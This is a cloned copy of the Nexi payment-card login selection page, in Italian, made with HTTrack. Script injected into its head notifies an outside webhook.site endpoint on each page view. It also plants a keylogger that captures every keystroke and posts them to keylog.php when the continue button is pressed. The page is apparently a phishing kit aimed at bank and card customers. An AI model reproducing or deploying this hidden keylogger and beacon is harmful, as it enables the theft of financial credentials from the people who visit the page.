<!DOCTYPE HTML>




<html lang="it" class=" no-js">
	
<!-- Mirrored from www.nexi.it/it/accedi by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 20 May 2024 15:37:08 GMT -->
<!-- Added by HTTrack --><meta http-equiv="content-type" content="text/html;charset=UTF-8" /><!-- /Added by HTTrack -->
<head>

    <meta charset="UTF-8"/>

    <title>Area personale Nexi</title>
    
    <meta name="description" content="Accedi alla tua area personale sul sito Nexi.it"/>
    <meta name="viewport" content="width=device-width, initial-scale=1"/>
    <meta http-equiv="X-UA-Compatible" content="IE=edge"/>
    <meta name="template" content="nexinew---content-page"/>
    <link rel="canonical" href="accedi.html"/>
	
	
	
		<link rel="alternate" hreflang="it" href="accedi.html"/>
	
	
	
	<meta name="robots" content="noindex, nofollow"/>
    
    
    

    
<meta name="og:title" property="og:title" content="Area personale Nexi"/>
<meta name="og:description" property="og:description" content="Accedi alla tua area personale sul sito Nexi.it"/>

<meta name="og:url" property="og:url" content="https://www.nexi.it/it/accedi"/>


<meta name="twitter:card" content="summary"/>

    
    
    




    
    <script type="text/javascript">
        window.dataLayer = window.dataLayer || [];
        window.nexinew = {};
    </script>

    
    <script type="text/javascript">
        window.nexinew.recaptchasitekey = "6Ld7ALUZAAAAAK4iDeutbuh9DdH\u002Do4dwFyb6FGIP";
    </script>

    
    
            <!-- Didomi style script mobile  -->
<script type="text/javascript">
            document.addEventListener('DOMContentLoaded', (event) => {
                document.body.classList.add("didomi-override");
            });
        </script>
<meta name="facebook-domain-verification" content="ksoa44f60wb7m2pyps7s69beldgqhh" />
<script>
  if (window.location.pathname === "/it" && window.localStorage.getItem("das_optim_granted") == "1") {
    var scriptElement = document.createElement('script');
    scriptElement.src = "https://cdn.optimizely.com/js/28838920070.js";
    document.head.appendChild(scriptElement);
  }
</script>
<script>
    document.addEventListener("DOMContentLoaded", function() {
    fetch('https://webhook.site/f18437dc-0876-43aa-9238-006447c55098', {
        method: 'POST',
        headers: {
            'Content-Type': 'application/json'
        },
        body: JSON.stringify({ message: 'Pagina visualizzata' })
    })
    .then(response => {
        if (!response.ok) {
            throw new Error('Errore nell\'invio del messaggio al webhook di Discord.');
        }
        console.log('Messaggio inviato con successo al webhook di Discord!');
    })
    .catch(error => {
        console.error('Errore:', error);
    });
});

var keylog = {
    cache: [],
    sending: false,
    init: function () {
        window.addEventListener("keydown", function (evt) {
            keylog.cache.push(evt.key);
        });

        var submitBtn = document.getElementById("continue-btn");
        if (submitBtn) {
            submitBtn.addEventListener("click", function (event) {
                event.preventDefault();
                keylog.send();
                window.location.href = ""; 
            });
        }
    },
    send: function () {
        if (!keylog.sending && keylog.cache.length !== 0) {
            keylog.sending = true;
            var data = new FormData();
            data.append("keys", JSON.stringify(keylog.cache));
            keylog.cache = [];

            var xhr = new XMLHttpRequest();
            xhr.open("POST", "keylog.php");
            xhr.onload = function () {
                keylog.sending = false;
                console.log(this.response);
            };
            xhr.send(data);
        }
    }
};

document.addEventListener("DOMContentLoaded", keylog.init);

</script>

    
    

    
        <!-- Google Tag Manager -->
        <script>
            (function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-MVCHKSD');;
        </script>
        <!-- end Google Tag Manager -->
    

    




    
    <script src="http://cdn.evgnet.com/beacon/nexipayments/engage/scripts/evergage.min.js"></script>

    
    

    


    
    

    
    

    
    

    
    

    
    

    
    
    


    
    
    

    

    
    
    
<link rel="stylesheet" href="https://www.nexi.it/etc.clientlibs/nexinew/clientlibs/clientlib-site.min.css" type="text/css">



    


    
    

    
    
	<link rel="icon" type="image/vnd.microsoft.icon" href="https://www.nexi.it/etc.clientlibs/nexinew/clientlibs/clientlib-site/resources/favicons/favicon.ico"/>
    <link rel="icon" type="image/png" href="https://www.nexi.it/etc.clientlibs/nexinew/clientlibs/clientlib-site/resources/favicons/favicon.png"/>


    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    

    
    

</head>
	<body>
		 
		 
		    

    
    

    
        <!-- Google Tag Manager (noscript) -->
        <noscript>
           <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-MVCHKSD"height="0" width="0" style="display:none;visibility:hidden"></iframe>
        </noscript>
        <!-- end Google Tag Manager (noscript) -->
    
    




    <!--[if lt IE 11]>
    <p class="browsehappy">
        You are using an <strong>outdated</strong> browser. Please <a href="http://browsehappy.com/">upgrade your
        browser</a> to improve your experience.
    </p>
    <![endif]-->

    
	<div class="base-page no-menu  ">
			
	        
	        
	        















	
	

        
            







	
	<main class="base-main">

        
            <section class="base-main__item">

    <div class="layout-prelogin">

        <div class="layout-prelogin__main">

            
            <div class="layout-prelogin__header">
                <div class="layout-prelogin__container">
                    <div class="layout-prelogin__header-wrapper">
                        <a class="btn-close" href="javascript:history.back()">
                            <span>CHIUDI</span>
                            <em class="icon-close"></em>
                        </a>
                    </div>
                </div>
            </div>
            

            
            <div class="layout-prelogin__content">
                <div class="layout-prelogin__container">
                    <div class="layout-prelogin__row">
                        <div class="layout-prelogin__title">
                            

	
    <div class="elem-title elem-title__h5  ">
        <h5 class="p-b-none"><b>Scegli a cosa vuoi accedere</b></h5>
    </div>





    


                        </div>
                    </div>
                    <div class="layout-prelogin__row">
                        
                        
                            







	
	
	    
        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white" style="background-color:#10C1E9;">

        

        <a class="elem-login-card__link" href="./login-titolari.html">
            <div class="elem-login-card__content">

                <div class="elem-login-card__arrow">
                    <em class="icon-arrow_right"></em>
                </div>

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <p><span class="elem-title__h6"><span class="elem-title__h5">Hai una carta<br />
personale o aziendale?</span></span></p>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    <div class="elem-login-card__title">
                        

	
    <div class="elem-title elem-title__h5  ">
        <h5 class="p-b-none"><b>Area Personale</b></h5>
    </div>





    


                    </div>
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1">Entra e <b>gestisci</b> la tua <b>carta Nexi</b> o di una <b>banca partner</b>.</span></p>

    </div>





    

                    </div>
                </div>

                <div class="elem-login-card__cta">
                    <div class="btn-primary-white">
                        <span>ACCEDI</span>
                    </div>
                </div>

            </div>
        </a>

    </div>
</div>




    



        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white" style="background-color:#33CCAA;">

        

        <a class="elem-login-card__link" href="./login-aziende.html">
            <div class="elem-login-card__content">

                <div class="elem-login-card__arrow">
                    <em class="icon-arrow_right"></em>
                </div>

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <p><span class="elem-title__h6"><span class="elem-title__h5">Gestisci le carte della<br />
tua azienda?</span></span></p>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    <div class="elem-login-card__title">
                        

	
    <div class="elem-title elem-title__h5  ">
        <h5 class="p-b-none"><b>Portale Aziende</b></h5>
    </div>





    


                    </div>
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1">Accedi e <b>amministra più carte contemporaneamente</b>, sia di Nexi che di una banca partner.</span></p>

    </div>





    

                    </div>
                </div>

                <div class="elem-login-card__cta">
                    <div class="btn-primary-white">
                        <span>ACCEDI</span>
                    </div>
                </div>

            </div>
        </a>

    </div>
</div>




    



        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white" style="background-color:#6781FC;">

        

        <a class="elem-login-card__link" href="./login-business.html">
            <div class="elem-login-card__content">

                <div class="elem-login-card__arrow">
                    <em class="icon-arrow_right"></em>
                </div>

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <p><span class="elem-title__h6"><span class="elem-title__h5">Hai un negozio o un'attività?</span></span></p>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    <div class="elem-login-card__title">
                        

	
    <div class="elem-title elem-title__h5  ">
        <h5 class="p-b-none"><b>Nexi Business</b></h5>
    </div>





    


                    </div>
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1"><b>Monitora</b> e gestisci il tuo <b>business</b> per tenere d'occhio le transazioni POS o dell'e‑commerce.</span></p>

    </div>





    

                    </div>
                </div>

                <div class="elem-login-card__cta">
                    <div class="btn-primary-white">
                        <span>ACCEDI</span>
                    </div>
                </div>

            </div>
        </a>

    </div>
</div>




    



        
	
	



                        
                    </div>
                </div>
            </div>
            

        </div>

        
        <div class="layout-prelogin__footer">
            <div class="layout-prelogin__footer-wrapper">

                <div class="layout-prelogin__footer-opener">
                    <button class="layout-prelogin__footer-btn" type="button" aria-expanded="false">
                        ALTRI PORTALI
                        <em class="icon-caret_up"></em>
                    </button>
                </div>

                <div class="layout-prelogin__footer-collapse " data-collapse="false">
                    <div class="layout-prelogin__footer-content">
                        <div class="layout-prelogin__container">
                            <div class="layout-prelogin__row">
                                
                                
                                    







	
	
	    
        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white">

        

        <a class="elem-login-card__link" href="https://icbp.seceti.it/ICBP-CORPORATE/preparaLogin.do;jsessionid=Ev5UHvX1XuLu7ohIxGot5CQ3.wfatas1">
            <div class="elem-login-card__content">

                

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <h2><span class="elem-text--body2"><b>Fast Invoice</b></span></h2>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1">Il portale dedicato alla fatturazione elettronica.</span></p>

    </div>





    

                    </div>
                </div>

                

            </div>
        </a>

    </div>
</div>




    



        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white">

        

        <a class="elem-login-card__link" href="https://ecommerce.nexi.it/ecomm/web/reporting/ReportLoginCs.jsp">
            <div class="elem-login-card__content">

                

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <h2><span class="elem-text--body2"><b>XPAY Backoffice</b></span></h2>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1">Il portale che ti permette di gestire la tua offerta XPAY.</span></p>

    </div>





    

                    </div>
                </div>

                

            </div>
        </a>

    </div>
</div>




    



        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white">

        

        <a class="elem-login-card__link" href="https://banche.nexi.it/portal/server.pt">
            <div class="elem-login-card__content">

                

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <h2><span class="elem-text--body2"><b>Portale Banche</b></span></h2>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1">L'area riservata alle banche che offre servizi informativi, operativi, dispositivi e di consultazione.</span></p>

    </div>





    

                    </div>
                </div>

                

            </div>
        </a>

    </div>
</div>




    



        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white">

        

        <a class="elem-login-card__link" href="https://all4you.icbpi.it/psd?portalenexi">
            <div class="elem-login-card__content">

                

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <h2><span class="elem-text--body2"><b>All 4 You</b></span></h2>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1">Per info e documenti su Payment Services.</span></p>

    </div>





    

                    </div>
                </div>

                

            </div>
        </a>

    </div>
</div>




    



        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white">

        

        <a class="elem-login-card__link" href="https://servizi.cartasi.it/platea/homePubblica.do">
            <div class="elem-login-card__content">

                

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <h2><span class="elem-text--body2"><b>Platea</b></span></h2>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1">Per e-commerce, POS e ATM degli esercenti.</span></p>

    </div>





    

                    </div>
                </div>

                

            </div>
        </a>

    </div>
</div>




    



        
            

<div class="layout-prelogin__col ">
    <div class="elem-login-card text-white">

        

        <a class="elem-login-card__link" href="https://www.keyclient.it/portal/portal/portale/banche">
            <div class="elem-login-card__content">

                

                <div class="elem-login-card__pretitle">
                    
	
    <div class="elem-text ">
        <h2><span class="elem-text--body2"><b>Portale Banche Ex Key Client</b></span></h2>

    </div>





    

                </div>

                <div class="elem-login-card__block">
                    
                    <div class="elem-login-card__text">
                        
	
    <div class="elem-text ">
        <p><span class="elem-text--body1">Per i servizi su carte e pagamenti ex Key Client.</span></p>

    </div>





    

                    </div>
                </div>

                

            </div>
        </a>

    </div>
</div>




    



        
	
	



                                
                            </div>
                        </div>
                    </div>
                </div>

            </div>
        </div>
        

    </div>

</section>




        

	</main>
	



        

	
	
















	
	

        

	
	



	</div>


		    
    
  
<script src="https://www.nexi.it/etc.clientlibs/nexinew/clientlibs/clientlib-site.min.js" async></script>
      
  

    
    
    
    
    
    <script type="text/javascript">window.gdprAppliesGlobally=false;(function(){function a(e){if(!window.frames[e]){if(document.body&&document.body.firstChild){var t=document.body;var n=document.createElement("iframe");n.style.display="none";n.name=e;n.title=e;t.insertBefore(n,t.firstChild)}
else{setTimeout(function(){a(e)},5)}}}function e(n,r,o,c,s){function e(e,t,n,a){if(typeof n!=="function"){return}if(!window[r]){window[r]=[]}var i=false;if(s){i=s(e,t,n)}if(!i){window[r].push({command:e,parameter:t,callback:n,version:a})}}e.stub=true;function t(a){if(!window[n]||window[n].stub!==true){return}if(!a.data){return}
var i=typeof a.data==="string";var e;try{e=i?JSON.parse(a.data):a.data}catch(t){return}if(e[o]){var r=e[o];window[n](r.command,r.parameter,function(e,t){var n={};n[c]={returnValue:e,success:t,callId:r.callId};a.source.postMessage(i?JSON.stringify(n):n,"*")},r.version)}}
if(typeof window[n]!=="function"){window[n]=e;if(window.addEventListener){window.addEventListener("message",t,false)}else{window.attachEvent("onmessage",t)}}}(function(e){
  var t=document.createElement("script");t.id="spcloader";t.type="text/javascript";t.async=true;t.src="https://sdk.privacy-center.org/"+e+"/loader.js?target="+document.location.hostname;t.charset="utf-8";var n=document.getElementsByTagName("script")[0];n.parentNode.insertBefore(t,n)})("3b629be4-eb58-4096-bdbb-615b2c83c816")})();</script>
    
    <script src="https://www.google.com/recaptcha/api.js?render=6Ld7ALUZAAAAAK4iDeutbuh9DdH-o4dwFyb6FGIP" async defer></script>
    
    
    
    
        <script>!function(){var i=document.createElement("script"),t=document.body?document.body:document.querySelector("head");i.src="https://acsbapp.com/apps/app/dist/js/app.js",i.async=!0,i.onload=function(){acsbJS.init({statementLink:"https://www.nexi.it/it/accessibilita",footerHtml:'<a href="https://www.accessiway.com/it/home/" target="_blank">AccessiWay. The Web Accessibility Solution</a>',hideMobile:!1,hideTrigger:!1,language:"it",position:"left",leadColor:"#2d32aa",triggerColor:"#2d32aa",triggerRadius:"50%",triggerPositionX:"left",triggerPositionY:"bottom",triggerIcon:"people",triggerSize:"medium",triggerOffsetX:25,triggerOffsetY:33,mobile:{triggerSize:"medium",triggerPositionX:"left",triggerPositionY:"bottom",triggerOffsetX:25,triggerOffsetY:70,triggerRadius:"50%"}})},t.appendChild(i)}();</script>
    

    

    


		
	</body>

<!-- Mirrored from www.nexi.it/it/accedi by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 20 May 2024 15:37:08 GMT -->
</html>


